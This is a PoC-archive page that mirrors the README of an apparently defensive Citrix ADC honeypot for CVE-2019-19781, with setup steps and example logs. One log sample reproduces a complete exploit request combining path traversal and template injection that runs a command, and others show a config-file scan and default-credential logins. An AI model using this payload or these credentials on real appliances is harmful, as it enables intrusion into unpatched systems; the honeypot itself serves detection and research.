Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2019-19781 PoC — Citrix Application Delivery Controller和Citrix Systems Gateway 路径遍历漏洞

Source
https://github.com/EliusHHimel/citrix-honeypot
Associated Vulnerability
Title:Citrix Application Delivery Controller和Citrix Systems Gateway 路径遍历漏洞 (CVE-2019-19781)
Description:Citrix Systems NetScaler Gateway(Citrix Systems Gateway)和Citrix Application Delivery Controller(ADC)都是美国思杰系统(Citrix Systems)公司的产品。Citrix Systems NetScaler Gateway是一套安全的远程接入解决方案。该方案可为管理员提供应用级和数据级管控功能,以实现用户从任何地点远程访问应用和数据。Citrix Application Delivery Controll
Description
Citrix ADC (NetScaler) Honeypot. Supports detection for CVE-2019-19781 and login attempts
Readme
# Citrix ADC (NetScaler) Honeypot
- Detects and logs payloads for CVE-2019-19781 (Shitrix / Citrixmash)
- Logs failed login attempts
- Serves content and headers taken from real appliance in order to increase chance of indexing on search engines (e.g. google, shodan etc.)

![screenshot](https://github.com/x1sec/citrix-honeypot/blob/master/img/screenshot.png)

## Installation

### Precompiled
Precompiled Linux (x64) package available [here](https://github.com/x1sec/citrix-honeypot/releases)

```
mkdir citrix-honeypot
cd citrix-honeypot
wget https://github.com/x1sec/citrix-honeypot/releases/download/v0.02/citrix-honeypot-linux-amd64.tar.gz
tar -xf citrix-honeypot-linux-amd64.tar.gz
```

### go get
If you have a [Go](https://golang.org/) environment ready to go:

```bash
go get github.com/x1sec/citrix-honeypot
```

### Running
Generate self signed certificate:
```
openssl genrsa -out server.key 2048
openssl ecparam -genkey -name secp384r1 -out server.key
openssl req -new -x509 -sha256 -key server.key -out server.crt -days 3650
```

It's easy as:
```bash
./citrix-honeypot
```

The honeypot will listen on both port `80` and `443` (so it must be run as `root` user)

Or to detach and run as a background process:
```
nohup ./citrix-honeypot &
```

## Logs
Results / data is written to the `./log` directory. They are:

`hits.log` - Scanning attempts and exploitation attempts with all data (e.g. headers, post body)

`all.log` - All HTTP requests that are observed hitting the server

`logins.log` - Attempted logins to the web interface

`tlsErrors.log` - Often internet scanners will send invalid data to port `443`. HTTPS errors are logged here.

### Examples

Running [the first public released exploit](https://github.com/projectzeroindia/CVE-2019-19781):
```
$ cat logs/hits.log 
2020/01/23 08:27:55 
-------------------
Exploitation detected ...
src: xxx.xxx.xxx.xxx
POST /vpn/../vpns/portal/scripts/newbm.pl HTTP/2.0
Host: xxx.xxx.xxx.xxx
Accept: */*
Content-Length: 181
Content-Type: application/x-www-form-urlencoded
Nsc_nonce: test1337
Nsc_user: /../../../../../../../../../../netscaler/portal/templates/zToMJRAzp0T0FuUS2cEp41ZZbmrtmUqS
User-Agent: curl/7.67.0

url=http://example.com\&title=[%25+template.new({'BLOCK'%3d'exec(\'id | tee /netscaler/portal/templates/zToMJRAzp0T0FuUS2cEp41ZZbmrtmUqS.xml\')%3b'})+%25]\&desc=test\&UI_inuse=RfWeb
```

Scanning attempt:
```
$ cat logs/hits.log 
2020/01/23 08:41:02 
-------------------
Scanning detected ... 
src: xxx.xxx.xxx.xxx
GET /vpn/../vpns/cfg/smb.conf HTTP/2.0
Host: xxx.xxx.xxx.xxx
Accept: */*
User-Agent: curl/7.67.0
```

Login attempts:
```
$ cat logs/logins.log
2020/01/23 07:26:03 Failed login from xxx.xxx.xxx.xxx user:nsroot pass:nsroot
2020/01/23 08:26:03 Failed login from xxx.xxx.xxx.xxx user:admin pass:admin
```
File Snapshot

 [4.0K]  /data/pocs/fc3fd65ed354149f9ab4405449d79049b773d544
├── [4.0K]  img
│   └── [124K]  screenshot.png
├── [1.0K]  LICENSE
├── [6.5K]  main.go
├── [2.7K]  README.md
└── [4.0K]  static
    ├── [4.0K]  admin_ui
    │   ├── [4.0K]  common
    │   │   ├── [4.0K]  css
    │   │   │   └── [4.0K]  ns
    │   │   │       ├── [3.5K]  button-sprite.png
    │   │   │       ├── [2.7K]  bytemobile_logo_header.png
    │   │   │       ├── [3.1K]  citrix_login_page_logo.png
    │   │   │       ├── [ 765]  company_logo.png
    │   │   │       ├── [ 978]  down_arrow_top.png
    │   │   │       ├── [1.1K]  footer_sprite.png
    │   │   │       ├── [ 14K]  login_footer_background.png
    │   │   │       ├── [1.1K]  pipe.png
    │   │   │       ├── [ 240]  selected_tab_left.gif
    │   │   │       ├── [1.3K]  selected_tab_right.gif
    │   │   │       ├── [ 39K]  ui.css
    │   │   │       ├── [1.4K]  unselected_tab_left.gif
    │   │   │       └── [4.2K]  unselected_tab_right.gif
    │   │   ├── [4.0K]  images
    │   │   │   ├── [ 11K]  dashboard_reporting_sprite_images.png
    │   │   │   └── [2.1K]  dwnloads_docs_sprite_images.png
    │   │   └── [4.0K]  js
    │   │       └── [4.0K]  jquery
    │   │           ├── [1.4K]  jquery.keyfilter.min.js
    │   │           ├── [8.8K]  jquery-migrate.js
    │   │           └── [ 86K]  jquery.min.js
    │   ├── [4.0K]  neo
    │   │   └── [4.0K]  images
    │   │       ├── [1.3K]  nav_down_red.png
    │   │       ├── [1.4K]  nav_down_yellow.png
    │   │       ├── [ 664]  nav_plain_gray.png
    │   │       └── [1.4K]  nav_up_green.png
    │   └── [4.0K]  rdx
    │       └── [4.0K]  core
    │           └── [4.0K]  css
    │               ├── [4.7K]  chrome.png
    │               ├── [826K]  citrix_white_bg.png
    │               ├── [6.6K]  firefox.png
    │               ├── [4.0K]  fonts
    │               │   └── [4.0K]  citrix_sans
    │               │       ├── [ 21K]  citrixsans_bold.eot
    │               │       ├── [ 21K]  citrixsans_bold.eot?
    │               │       ├── [ 72K]  citrixsans_bold.svg
    │               │       ├── [ 43K]  citrixsans_bold.ttf
    │               │       ├── [ 25K]  citrixsans_bold.woff
    │               │       ├── [ 22K]  citrixsans_regular.eot
    │               │       ├── [ 22K]  citrixsans_regular.eot?
    │               │       ├── [ 72K]  citrixsans_regular.svg
    │               │       ├── [ 43K]  citrixsans_regular.ttf
    │               │       └── [ 26K]  citrixsans_regular.woff
    │               ├── [5.7K]  internet-explorer.png
    │               └── [7.7K]  safari.png
    ├── [ 19K]  do_login.html
    └── [ 19K]  index.html

16 directories, 43 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.